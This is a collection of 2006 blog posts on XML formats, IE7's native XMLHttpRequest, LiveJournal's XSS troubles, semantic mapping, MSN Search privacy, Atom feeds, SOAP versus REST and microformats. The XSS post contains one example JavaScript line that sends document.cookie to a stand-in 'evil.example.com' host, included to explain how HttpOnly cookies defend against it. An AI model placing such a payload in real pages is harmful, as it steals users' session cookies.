Brian Jones has a blog post entitled Corel to support Microsoft Office Open XML Formats which begins

Corel has stated that they will support the new XML formats in WordPerfect once we release Office '12'. We've already seen other applications like OpenOffice and Apple's TextEdit support the XML formats that we built in Office 2003. Now as we start providing the documentation around the new formats and move through Ecma, we'll see more and more people come on board and support these new formats. Here is a quote from Jason Larock of Corel talking about the formats they are looking to support in coming versions (http://labs.pcw.co.uk/2006/01/new_wordperfect_1.html):

Larock said no product could match WordPerfect's support for a wide variety of formats and Corel would include OpenXML when Office 12 is released. "We work with Microsoft now and we will continue to work with Microsoft, which owns 90 percent of the market. We would basically cut ourselves off if we didn't support the format."

But he admitted that X3 does not support the Open Document Format (ODF), which is being proposed as a rival standard, "because no customer that we are currently dealing with has asked us to do so."

X3 does, however, allow the import and export of Portable Document Format (PDF) files, something Microsoft has promised for Office 12.

I mention this article because I wanted to stress again that even our competitors will now have clear documentation that allows them to read and write our formats. Even that isn't as big a deal as the fact that any solution provider can do this. It means that these documents can still be easily accessed 100 years from now, and can start to play a more meaningful role in business processes.

Again I want to extend my kudos to Brian and the rest of the folks on the Office team who have been instrumental in the transition of the Microsoft Office file formats from proprietary binary formats to open XML formats.


 

Categories: Mindless Link Propagation | XML

Sunava Dutta on the Internet Explorer team has written about their support for a Native XMLHTTPRequest object in IE 7. He writes

I’m excited to mention that IE7 will support a scriptable native version of XMLHTTP. This can be instantiated using the same syntax across different browsers and decouples AJAX functionality from an ActiveX enabled environment.

What is XMLHTTP?

XMLHTTP was first introduced to the world as an ActiveX control in Internet Explorer 5.0. Over time, this object has been implemented by other browsing platforms, and is the cornerstone of “AJAX” web applications. The object allows web pages to send and receive XML (or other data) via the HTTP protocol. XMLHTTP makes it possible to create responsive web applications that do not require redownloading the entire page to display new data. Popular examples of AJAX applications include the Beta version of Windows Live Local, Microsoft Outlook Web Access, and Google’s GMail.

Charting the changes: XMLHTTP in IE7 vs. IE6

In IE6 and below, XMLHTTP is implemented as an ActiveX object provided by MSXML.

In IE7, XMLHTTP is now also exposed as a native script object. Users and organizations that choose to disable ActiveX controls can still use XMLHTTP based web applications. (Note that an organization may use Group Policy or IE Options to disable the new native XMLHTTP object if desired.) As part of our continuing security improvements we now allow clients to configure and customize a security policy of their choice and simultaneously retain functionality across key AJAX scenarios.

IE7’s implementation of the XMLHTTP object is consistent with that of other browsers, simplifying the task of cross-browser compatibility.  Using just a bit of script, it’s easy to build a function which works with any browser that supports XMLHTTP:

var xmlHttp;
if (window.XMLHttpRequest) {
    // If IE7, Mozilla, Safari, etc.: use the native object
    xmlHttp = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
    // ...otherwise, use the ActiveX control for IE5.x and IE6
    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}

Note that IE7 will still support the legacy ActiveX implementation of XMLHTTP alongside the new native object, so pages currently using the ActiveX control will not require rewrites.
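To make the mechanics concrete, here's a rough usage sketch building on the detection code above; the /headlines.xml URL and the showHeadlines callback are made up for illustration:

if (xmlHttp) {
    xmlHttp.open("GET", "/headlines.xml", true);  // true = asynchronous
    xmlHttp.onreadystatechange = function () {
        // readyState 4 means the request is complete; status 200 means HTTP OK
        if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
            showHeadlines(xmlHttp.responseXML);  // hand the parsed XML to the page
        }
    };
    xmlHttp.send(null);
}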

I wonder if anyone else sees the irony in Internet Explorer copying features from Firefox which were originally copied from IE?


 

Categories: Web Development

Brad Fitzpatrick, founder of LiveJournal, has a blog post entitled Firefox bugs where he talks about some of the issues that led to the recent account hijackings on the LiveJournal service.

What I found most interesting were Brad's comments on Bug #324253 - Do Something about the XSS issues that -moz-binding introduces in the Firefox Bugzilla database. Brad wrote

Hello, this is Brad Fitzpatrick from LiveJournal.

Just to clear up any confusion: we do have a very strict HTML sanitizer. But we made the decision (years ago) to allow users to host CSS files offsite because... why not? It's just style declarations, right?

But then came along behavior, expression, -moz-binding, etc, etc...

Now CSS is full of JavaScript. Bleh.

But Internet Explorer has two huge advantages over Mozilla:

-- HttpOnly cookies (Bug 178993), which LiveJournal sponsored for Mozilla over a year ago. Still not in tree.

-- same-origin restrictions, so an offsite behavior/binding can't mess with the calling node's DOM/Cookies/etc.

Either one of these would've saved our ass.

Now, I understand the need to innovate and add things like -moz-binding, but please keep in mind the authors of webapps, who are fighting a constant battle to improve their HTML sanitizers against new features which are added to browsers.

What we'd REALLY love is some document meta tag or HTTP response header that declares the local document safe from all external scripts. HttpOnly cookies are such a beautiful idea, we'd be happy with just that, but Comment 10 is also a great proposal... being able to declare the trust level, effectively, of external resources. Then our HTML cleaner would just insert/remove the untrusted/trusted, respectively.
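For those who haven't run into them, the HttpOnly cookies Brad mentions work like this: a cookie flagged HttpOnly is still sent on every HTTP request, but it is hidden from script. Here's a rough sketch of why that blunts cookie theft via XSS (the URLs are made up):

// Suppose the server sets the session cookie with the HttpOnly flag:
//
//     Set-Cookie: session=abc123; HttpOnly
//
// Injected script still runs, but document.cookie no longer exposes the
// session cookie, so a classic exfiltration payload comes up empty:
var stolen = document.cookie;  // "session=abc123" is NOT included here
new Image().src = "http://evil.example.com/steal?c=" + encodeURIComponent(stolen);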

Cross-site scripting attacks are a big problem for websites that allow users to provide HTML input. LiveJournal isn't the only major blogging site to have been hit by them; last year the 'samy is my hero' worm hit MySpace and caused some downtime for the service.

What I find interesting from Brad's post is how, on the one hand, richer features in browsers are desirable (e.g. embedded JavaScript in CSS) while, on the other, they become a burden for developers building web apps, who now have to worry that even stylesheets can contain malicious code.

The major browser vendors really need to do a better job here. I totally agree with one of the follow-up comments in the bug, which stated, "If Moz & Microsoft can agree on SSL/anti-phishing policy and an RSS icon, is consensus on scripting security policy too hard to imagine?" Collaborating on simple stuff like what orange icon to use for subscribing to feeds is nice, but areas like Web security could do with more standardization across browsers. I wonder if the WHATWG is working on standardizing anything in this area... 


 

Categories: Web Development

January 23, 2006
@ 10:42 PM

I don't usually spam folks with links to amusing video clips that are making the rounds in email inboxes, but the video of Aussie comedy group Tripod performing their song "Make You Happy Tonight" struck a chord with me because I did what the song talks about this weekend.

The game in question was Star Wars: Knights of the Old Republic II. :)


 

One part of the XML vision that has always resonated with me is that it encourages people to build custom XML formats specific to their needs, but allows them to map between languages using technologies like XSLT. However, XML technologies like XSLT focus on mapping one kind of syntax to another. There is another school of thought among proponents of Semantic Web technologies such as RDF, OWL, and DAML+OIL, which holds that higher-level mapping between the semantics of languages is a better approach. 

In previous posts such as RDF, The Semantic Web and Perpetual Motion Machines and More on RDF, The Semantic Web and Perpetual Motion Machines, I've disagreed with the thinking of Semantic Web proponents because in the real world you have to mess with both syntactic mappings and semantic mappings. A great example of this is shown in the post entitled On the Quality of Metadata... by Stefano Mazzocchi, where he writes

One thing we figured out a while ago is that merging two (or more) datasets with high quality metadata results in a new dataset with much lower quality metadata. The "measure" of this quality is just subjective and perceptual, but it's a constant thing: every time we showed this to people who cared about the data more than the software we were writing, they could not understand why we were so excited about such a system, where clearly the data was so much poorer than what they were expecting.

We use the usual "this is just a prototype and the data mappings were done without much thinking" kind of excuse, just to calm them down, but now that I'm tasked to "do it better this time", I'm starting to feel a little weird because it might well be that we hit a general rule, one that is not a function of how much thinking you put into the data mappings or ontology crosswalks, and talking to Ben helped me understand why.

First, let's start noting that there is no practical and objective definition of metadata quality, yet there are patterns that do emerge. For example, at the most superficial level, coherence is considered a sign of good care and (here all the metadata lovers would agree) good care is what it takes for metadata to be good. Therefore, lack of coherence indicates lack of good care, which automatically resolves in bad metadata.

Note how this is nothing but a syllogism, yet it's something that, rationally or not, comes up all the time.

This is very important. Why? Well, suppose you have two metadatasets, each of them very coherent and well polished about, say, music. The first encodes Artist names as "Beatles, The" or "Lennon, John", while the second encodes them as "The Beatles" and "John Lennon". Both datasets, independently, are very coherent: there is only one way to spell an artist/band name, but when the two are merged and the ontology crosswalk/map is done (either implicitly or explicitly), the result is that some songs will now be associated with "Beatles, The" and others with "The Beatles".

The result of merging two high quality datasets is, in general, another dataset with a higher "quantity" but a lower "quality" and, as you can see, the ontological crosswalks or mappings were done "right", where for "right" I mean that both sides of the ontological equation would have approved that "The Beatles" or "Beatles, The" are the band name that is associated with that song.

At this point, the fellow semantic web developers would say "pfff, of course you are running into trouble, you haven't used the same URI" and the fellow librarians would say "pff, of course, you haven't mapped them to a controlled vocabulary of artist names, what did you expect?".. deep inside, they are saying the same thing: you need to further link your metadata references "The Beatles" or "Beatles, The" to a common, hopefully globally unique identifier. The librarian shakes the semantic web advocate's hand, nodding vehemently and they are happy campers.

The problem Stefano has pointed out is that just being able to say that two items are semantically identical (e.g. an artist field in dataset A is the same as the 'band name' field in dataset B) doesn't mean you won't have to do some syntactic mapping as well (e.g. altering artist names of the form "ArtistName, The" to "The ArtistName") if you want an accurate mapping.
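To make that concrete, here's a rough sketch (mine, not Stefano's) of the syntactic step that is still needed after the semantic equivalence has been declared:

// Even after dataset A's 'artist' field and dataset B's 'band name' field
// are declared semantically identical, the values themselves still have to
// be reconciled before the merged data is coherent.
function normalizeArtistName(name) {
    var parts = name.split(", ");
    if (parts.length == 2) {
        return parts[1] + " " + parts[0];  // "Beatles, The" -> "The Beatles"
    }
    return name;  // already in natural order, e.g. "The Beatles"
}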

The example I tend to draw on from my personal experience is mapping between different XML syndication formats such as Atom 1.0 and RSS 2.0. Mapping between both formats isn't simply a case of saying <atom:published> owl:sameAs <pubDate> or that <atom:author> owl:sameAs <author>. In both cases, an application that understands how to process one format (e.g. an RSS 2.0 parser) would not be able to process the syntax of the equivalent elements in the other (e.g. RFC 3339 dates as opposed to RFC 822 dates).
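Here's a small sketch of the kind of syntactic shim this implies, assuming a Date implementation that can parse RFC 3339 strings:

// Map an Atom date (RFC 3339) to an RSS 2.0 pubDate (RFC 822 style),
// since an RSS 2.0 processor can't consume the Atom date syntax directly.
function atomDateToRssDate(rfc3339) {
    var d = new Date(rfc3339);  // e.g. "2006-01-23T22:42:00Z"
    return d.toUTCString();     // e.g. "Mon, 23 Jan 2006 22:42:00 GMT"
}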

Proponents of Semantic Web technologies tend to gloss over these harsh realities of mapping between vocabularies in the real world. I've seen claims that simply using XML technologies for mapping between XML vocabularies means you will need N² transforms, as opposed to needing 2N transforms if using Semantic Web technologies (Stefano mentions this in his post, as has Ken Macleod in his post XML vs. RDF :: N × M vs. N + M). The explicit assumption here is that these vocabularies have similar data models and semantics, which should be true, otherwise a mapping wouldn't be possible. However, the implicit assumption is that the syntax of each vocabulary is practically identical (e.g. same naming conventions, same date formats, etc.), and this post provides a few examples where that is not the case. 

What I'd be interested in seeing is whether there is a way to get some of the benefits of Semantic Web technologies while acknowledging the need for syntactical mappings as well. Perhaps some weird hybrid of OWL and XSLT? One can only dream...


 

Categories: Web Development | XML

January 21, 2006
@ 02:26 AM

There's been a bunch of speculation about the recent DOJ requests for logs from the major search engines. Ken Moss of the MSN Search team tells their side of the story in his post Privacy and MSN Search. He writes

There’s been quite a frenzy of speculation over the past 24 hours regarding the request by the government for some data in relation to a child online protection lawsuit. Obviously privacy and child protection are both super important topics – so I’m glad this discussion is happening.

Some facts have been reported, but mostly I’ve seen a ton of speculation reported as facts.   I wanted to use this blog post to clarify some facts and to share with you what we are thinking here at MSN Search.

Let me start with this core principle statement: privacy of our customers is non-negotiable and something worth fighting to protect.

Now, on to the specifics.  

Over the summer we were subpoenaed by the DOJ regarding a lawsuit. The subpoena requested that we produce data from our search service. We worked hard to scope the request to something that would be consistent with this principle. The applicable parties to the case received this data, and the parties agreed that the information specific to this case would remain confidential. Specifically, we produced a random sample of pages from our index and some aggregated query logs that listed queries and how often they occurred. Absolutely no personal data was involved.

With this data you:

        CAN see how frequently some query terms occurred.
        CANNOT look up an IP address and see what its user queried.
        CANNOT look for users who queried for both “TERM A” and “TERM B”.

At MSN Search, we have strict guidelines in place to protect the privacy of our customers’ data, and I think you’ll agree that privacy was fully protected. We tried to strike the right balance in a very sensitive matter.

I've been surprised at how much rampant speculation from blogs has been reported as fact in mainstream media articles, without people getting information directly from the source.


 

Categories: Current Affairs

A user of RSS Bandit recently forwarded me a discussion on the atom-syntax mailing list which criticized some of our design decisions. In an email in the thread entitled Reader 'updated' semantics Tim Bray wrote

On Jan 10, 2006, at 9:07 AM, James M Snell wrote:

In RSS there is definite confusion on what constitutes an update. In
Atom it is very clear. If <updated> changes, the item has been updated.
No controversy at all.

Indeed. There's a word for the behavior of RssBandit and Sage: WRONG. Atom provides a 100% unambiguous way to say "this is the same entry, but it's been changed and the publisher thinks the change is significant." Software that chooses to hide this fact from users is broken - arguably dangerous to those who depend on receiving timely and accurate information - and should not be used. -Tim

People who write technology specifications usually have good intentions, but unfortunately they often aren't implementers of the specs they create. This leads to disconnects between reality and what is actually in the spec.

The problem with updates to blog posts is straightforward. There are minor updates which don't warrant signalling to the user, such as typos being fixed (e.g. "12 of 13 miner survive mine collapse" changed to "12 of 13 miners survive mine collapse"), and updates which do because they significantly change the story (e.g. "12 of 13 miners survive mine collapse" changed to "12 of 13 miners killed in mine collapse"). 

James Snell is right that it is ambiguous how to detect this in RSS but not in Atom due to the existence of the atom:updated element. The Atom spec states

The "atom:updated" element is a Date construct indicating the most recent instant in time when an entry or feed was modified in a way the publisher considers significant. Therefore, not all modifications necessarily result in a changed atom:updated value.

On paper it sounds like this solves the problem, and on paper it does. However, for this to work correctly, weblog software now needs to include an option such as 'Indicate that this change is significant' when users edit posts. Without such an option, the software cannot correctly support the atom:updated element. Since I haven't found any mainstream tools that support this functionality, I haven't bothered to implement a feature that is likely to annoy users more often than it is useful, since many people edit their blog posts in ways that don't warrant alerting the reader.
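For the curious, here is roughly what honoring atom:updated would look like in aggregator code; the item store and the markAsUpdated helper are hypothetical, and updated values are assumed to be comparable timestamps:

function processEntry(store, entry) {
    var existing = store.lookup(entry.id);  // atom:id identifies the entry
    if (existing == null) {
        store.add(entry);                   // brand new entry
    }
    else if (entry.updated > existing.updated) {
        store.replace(entry);               // publisher flagged a significant change
        markAsUpdated(entry);               // ...so surface it to the user
    }
    // otherwise it's a minor edit (e.g. a typo fix): atom:updated is
    // unchanged, so the aggregator stays quiet
}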

However I do plan to add features for indicating when posts have changed in unambiguous scenarios such as when new comments are added to a blog post of interest to the user. The question I have for our users is how would you like this indicated in the RSS Bandit user interface?


 

Categories: RSS Bandit

January 20, 2006
@ 02:27 AM

Richard Searle has a blog post entitled The SOAP retrieval anti-pattern where he writes

I have seen systems that use SOAP based Web Services only to implement data retrievals.

The concept is to provide a standardized mechanism for external systems to retrieve data from some master system that controls the data of interest. This has value in that it enforces a decoupling from the master system's data model. It can also be easier to manage and control than the alternative of allowing the consuming systems to directly query the master system's database tables.
...
The selection of a SOAP interface over a RESTful interface is also questionable. The SOAP interface has a few (generally one) parameters and then returns a large object. Such an interface with a single parameter has a trivial representation as a GET. A multi-parameter call can also be trivially mapped if the parameters define a conceptual hierarchy (e.g. the ids of a company and one of its employees).

Such a GET interface avoids all the complexities of SOAP, WSDL, etc. AJAX and XForms clients can use the interface trivially and directly. A browser can use XSLT to provide a human-readable representation.

Performance can easily be boosted by interposing a web cache. Such optimization would probably occur essentially automatically, since any significant site would already have caching. Such caching can be further enhanced by using the HTTP header timestamps to compare against the updated timestamps in the master system's tables.

I agree 100%; web services that use SOAP solely for data retrieval are usually a sign that the designers of the service need to get a clue when it comes to building distributed applications for the Web.
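To illustrate with the company/employee example from the post (the host name and URL structure are made up), the RESTful version is just a GET that any intermediate web cache can serve:

var req = new XMLHttpRequest();
req.open("GET", "http://example.com/companies/42/employees/1337", false);  // synchronous for brevity
req.send(null);
var employee = req.responseXML;  // plain XML; no SOAP envelope, no WSDL needed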

PS: I realize that my employer has been guilty of this in the past. In fact, we've been known to do this at MSN as well, although at least we also provided RESTful interfaces to the service in that instance. ;)


 

Categories: XML Web Services

Since writing my post Microformats vs. XML: Was the XML Vision Wrong?, I've come across some more food for thought on the appropriateness of using microformats over XML formats. The real-world test case I use when thinking about choosing microformats over XML is whether, instead of having an HTML web page for my blog and an Atom/RSS feed, I should have a single HTML page with <div class="rss:item"> or <h3 class="atom:title"> embedded in it. To me this seems like a gross hack, but I've seen lots of people comment on how this seems like a great idea to them. Given that I hadn't encountered universal disdain for the idea, I decided to explore further and look for technical arguments for and against both approaches.

I found quite a few discussions of how and why microformats came about in articles such as The Microformats Primer in Digital Web Magazine and Introduction to Microformats in the Microformats wiki. However, I hadn't seen many in-depth technical arguments for why they are better than XML formats until recently. 

In a comment in response to my Microformats vs. XML: Was the XML Vision Wrong? post, Mark Pilgrim wrote

Before microformats had a home page, a blog, a wiki, a charismatic leader, and a cool name, I was against using XHTML for syndication for a number of reasons.

http://diveintomark.org/archives/2002/11/26/syndication_is_not_publication

I had several basic arguments:

1. XHTML-based syndication required well-formed semantic XHTML with a particular structure, and was therefore doomed to failure. My experience in the last 3+ years with both feed parsing and microformats parsing has convinced me that this was incredibly naive on my part. Microformats may be *easier* to accomplish with semantic XHTML (just like accessibility is easier in many ways if you're using XHTML + CSS), but you can embed structured data in really awful existing HTML markup, without migrating to "semantic XHTML" at all.

2. Bandwidth. Feeds are generally smaller than their corresponding HTML pages (even full content feeds), because they don't contain any of the extra fluff that people put on web pages (headers, footers, blogrolls, etc.) And feeds only change when actual content changes, whereas web pages can change for any number of valid reasons that don't involve changes to the content a feed consumer would be interested in. This is still valid, and I don't see it going away anytime soon.

3. The full-vs-partial content debate. Lots of people who publish full content on web pages (including their home page) want to publish only partial content in feeds. The rise of spam blogs that automatedly steal content from full-content feeds and republish them (with ads) has only intensified this debate.

4. Edge cases. Hand-crafted feed summaries. Dates in Latin. Feed-only content. I think these can be handled by microformats or successfully ignored. For example, machine-readable dates can be encoded in the title attribute of the human-readable date. Hand-crafted summaries can be published on web pages and marked up appropriately. Feed-only content can just be ignored; few people do it and it goes against one of the core microformats principles that I now agree with: if it's not human-readable in a browser, it's worthless or will become worthless (out of sync) over time.
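Mark's fourth point is easy to make concrete. In hCalendar, the machine-readable date lives in the title attribute of the human-readable one, e.g. <abbr class="dtstart" title="2006-01-20">last Friday</abbr>, and a parser digs it out with a little DOM walking. A rough sketch, not an official microformats parser:

function readDtStart(container) {
    var abbrs = container.getElementsByTagName("abbr");
    for (var i = 0; i < abbrs.length; i++) {
        // naive class check, good enough for a sketch
        if (abbrs[i].className.indexOf("dtstart") != -1) {
            return abbrs[i].getAttribute("title");  // e.g. "2006-01-20"
        }
    }
    return null;  // no hCalendar start date in this fragment
}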

I tend to agree with Mark's conclusions. The main issue with using microformats for syndication instead of RSS/Atom feeds is wasted bandwidth, since web pages tend to contain more stuff than feeds and change more often.

Norm Walsh raises a few other good points on the trade-offs being made when choosing microformats over XML in his post Supporting Microformats, where he writes

Microformats (and architectural forms, and all the other names under which this technique has been invented) take this one step further by standardizing some of these attribute values and possibly even some combination of element types and attribute values in one or more content models.

This technique has some stellar advantages: it's relatively easy to explain, and the fallback is natural and obvious; new code can be written to use this “extra” information without any change being required to existing applications, they just ignore it.

Despite how compelling those advantages are, there are some pretty serious drawbacks associated with microformats as well. Adding hCalendar support to my itineraries page reinforced several of them.

  1. They're not very flexible. While I was able to add hCalendar to the overall itinerary page, I can't add it to the individual pages because they don't use the right markup. I'm not using <div> and <span> to markup the individual appointments, so I can't add hCalendar to them.

  2. I don't think they'll scale very well. Microformats rely on the existing extensibility point, the role or class attribute. As such, they consume that extensibility point, leaving me without one for any other use I may have.

  3. They're devilishly hard to validate. DTDs and W3C XML Schema are right out the door for validating microformats. Of course, Schematron (and other rule-based validation languages) can do it, but most of us are used to using grammar-based validation on a daily basis and we're likely to forget the extra step of running Schematron validation.

    It's interesting that RELAX NG can almost, but not quite, do it. RELAX NG has no difficulty distinguishing between two patterns based on an attribute value, but you can't use those two patterns in an interleave pattern. So the general case, where you want to say that the content of one of these special elements is “an <abbr> with class="dtstart" interleaved with an <abbr> with class="dtend" interleaved with…”, you're out of luck. If you can limit the content to something that doesn't require interleaving, you can use RELAX NG for your particular application, but most of the microformats I've seen use interleaving in the general case.

    Is validation really important? Well, I have well over a decade of experience with markup languages at this point and I was reminded just last week that I can't be relied upon to write a simple HTML document without markup errors if I don't validate it. If they can't be validated, they will often be incorrect.

The complexity of validating microformats isn't something I'd considered in my original investigation but is a valid point. As a developer of an RSS aggregator, I've found the existence of the Feed Validator to be an immense help in tracking down issues. Not having the luxury of being able to validate feeds would make building an aggregator a lot harder and a lot less fun. 

I'll continue to pay attention to this discussion but for now microformats will remain in the "gross hack" bucket for me.


 

Categories: XML

January 18, 2006
@ 12:03 PM

Once people find out that they can use tools like ecto, BlogJet or w.bloggar to manage their blog on MSN Spaces via the MetaWeblog API, they often ask me why we don't have something equivalent to the Flickr API so they can do the same for the photos they have in their space. 
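For those who haven't seen it on the wire, the MetaWeblog API is XML-RPC, so creating a post is just an HTTP POST like the sketch below; the endpoint URL is made up, the payload is abbreviated, and the browser XMLHTTP object stands in for whatever HTTP stack a desktop tool would actually use:

var payload =
    '<?xml version="1.0"?>' +
    '<methodCall>' +
    '<methodName>metaWeblog.newPost</methodName>' +
    '<params>' +
    '<param><value><string>myBlogId</string></value></param>' +
    '<param><value><string>myUserName</string></value></param>' +
    '<param><value><string>myPassword</string></value></param>' +
    '<param><value><struct>' +
    '<member><name>title</name><value><string>Hello</string></value></member>' +
    '<member><name>description</name><value><string>My first post</string></value></member>' +
    '</struct></value></param>' +
    '<param><value><boolean>1</boolean></value></param>' +  // 1 = publish immediately
    '</params>' +
    '</methodCall>';

var req = new XMLHttpRequest();
req.open("POST", "http://example.com/metaweblog/api.aspx", false);
req.setRequestHeader("Content-Type", "text/xml");
req.send(payload);  // the response contains the new post's id

A photo API could follow the same pattern, with methods for creating albums and uploading images.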

My question for folks out there is whether this is something you'd like to see. Do you want to be able to create, edit and delete photos and photo albums in your Space using desktop tools? If so, what kind of tools do you have in mind?

If you are a developer, what kind of API would you like to see? Should it use XML-RPC, SOAP or REST? Do you want a web service or a DLL?

Let me know what you think.


 

Categories: Windows Live | XML Web Services